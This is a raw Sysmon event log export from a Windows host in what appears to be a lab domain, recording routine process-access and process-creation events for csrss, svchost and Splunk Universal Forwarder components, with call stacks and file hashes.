16:03:09.531{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029445Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:09.531{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-543D-6008-B806-00000000A301}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029444Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:09.531{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-543D-6008-B806-00000000A301}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029443Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:09.532{7901BC46-543D-6008-B806-00000000A301}7044C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029460Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:10.203{7901BC46-543E-6008-B906-00000000A301}81167488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029459Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:10.047{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-543E-6008-B906-00000000A301}8116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029458Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:10.047{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029457Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:10.047{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029456Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:10.047{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029455Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:10.047{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029454Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:10.047{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-543E-6008-B906-00000000A301}8116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029453Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:10.047{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-543E-6008-B906-00000000A301}8116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029452Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:10.048{7901BC46-543E-6008-B906-00000000A301}8116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029477Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.765{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-543F-6008-BB06-00000000A301}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029476Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.765{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029475Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.765{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029474Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.765{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029473Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.765{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029472Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.765{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-543F-6008-BB06-00000000A301}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029471Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.765{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-543F-6008-BB06-00000000A301}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000029470Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.766{7901BC46-543F-6008-BB06-00000000A301}3316C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7901BC46-4985-6008-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000029469Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.250{7901BC46-543F-6008-BA06-00000000A301}55365580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029468Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.093{7901BC46-4A1A-6008-B100-00000000A301}26404044C:\Windows\system32\conhost.exe{7901BC46-543F-6008-BA06-00000000A301}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029467Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.093{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029466Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.093{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029465Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.093{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029464Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.093{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000029463Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.093{7901BC46-4984-6008-0500-00000000A301}640656C:\Windows\system32\csrss.exe{7901BC46-543F-6008-BA06-00000000A301}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000029462Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 16:03:11.093{7901BC46-4A19-6008-AD00-00000000A301}42365060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7901BC46-543F-6008-BA06-00000000A301}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 